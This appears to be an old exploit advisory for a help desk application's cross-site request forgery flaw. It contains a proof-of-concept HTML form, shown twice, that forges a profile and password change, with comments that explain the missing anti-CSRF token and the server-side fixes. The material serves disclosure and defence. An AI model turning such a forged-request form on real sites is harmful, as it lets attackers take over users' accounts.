# Exploit Title: Help Desk Software ~~**** XSRF (cross-site request forgery) Vuln.
# Demo : http://www.hesk.com/demo
# Date: 15.08.2011
# Author: İzâm
# Note: Warning. Not intended to cause damage; for informational purposes only.
##############################################
<!-- Proof-of-concept form from the advisory. It posts a profile update
     (display name, e-mail, new password entered twice) to a script whose
     path is left as a placeholder in the action attribute. -->
<!-- Defender's reading: every field below can be predefined by a page on
     another origin. The form carries no hidden per-session anti-CSRF token
     and no current-password field alongside newpass/newpass2. If the server
     accepts the request as shown (which is what the advisory title claims),
     the fix is server-side:
       * require an unpredictable, session-bound token on every
         state-changing POST and reject requests without it;
       * ask for the current password before changing password or e-mail;
       * set SameSite on the session cookie and check Origin/Referer as
         defence in depth.
     For triage, look in access logs for POSTs to the profile-update script
     whose Origin/Referer is not the help desk's own host. -->
<form method=post action=site/[PATH]/.php name=form1>
<input type=text name=name size=30 maxlength=50 value=İzâm />
<!-- "[email protected]" stands where a value= attribute would be; this looks
     like the hosting site's e-mail obfuscation, and the original address is
     not recoverable from this page. -->
<input type=text name=email size=30 maxlength=255 [email protected] />
<!-- The two password inputs are left empty in the advisory. -->
<input type=password name=newpass size=30 maxlength=20 />
<input type=password name=newpass2 size=30 maxlength=20 />
<input type=submit value=Update profile />
</form>
# Demo : http://www.hesk.com/demo
# Date: 15.08.2011
# Author: İzâm
# Note: Warning. Not intended to cause damage; for informational purposes only.
##############################################
<!-- Repeat of the advisory's proof-of-concept profile-update form (the page
     lists it twice). What matters for a reviewer is what is absent: there is
     no hidden anti-CSRF token field and no current-password field, so the
     request is built only from values a third-party page could supply.
     Whether the server actually accepts it cannot be confirmed from this
     page. The remediation is a session-bound token check on the
     profile-update handler plus re-authentication for password and e-mail
     changes, with SameSite cookies as an additional layer. -->
<form method=post action=site/[PATH]/.php name=form1>
<input type=text name=name size=30 maxlength=50 value=İzâm />
<!-- The value= attribute here was replaced by "[email protected]", presumably
     by the hosting site's e-mail obfuscation. -->
<input type=text name=email size=30 maxlength=255 [email protected] />
<input type=password name=newpass size=30 maxlength=20 />
<input type=password name=newpass2 size=30 maxlength=20 />
<input type=submit value=Update profile />
</form>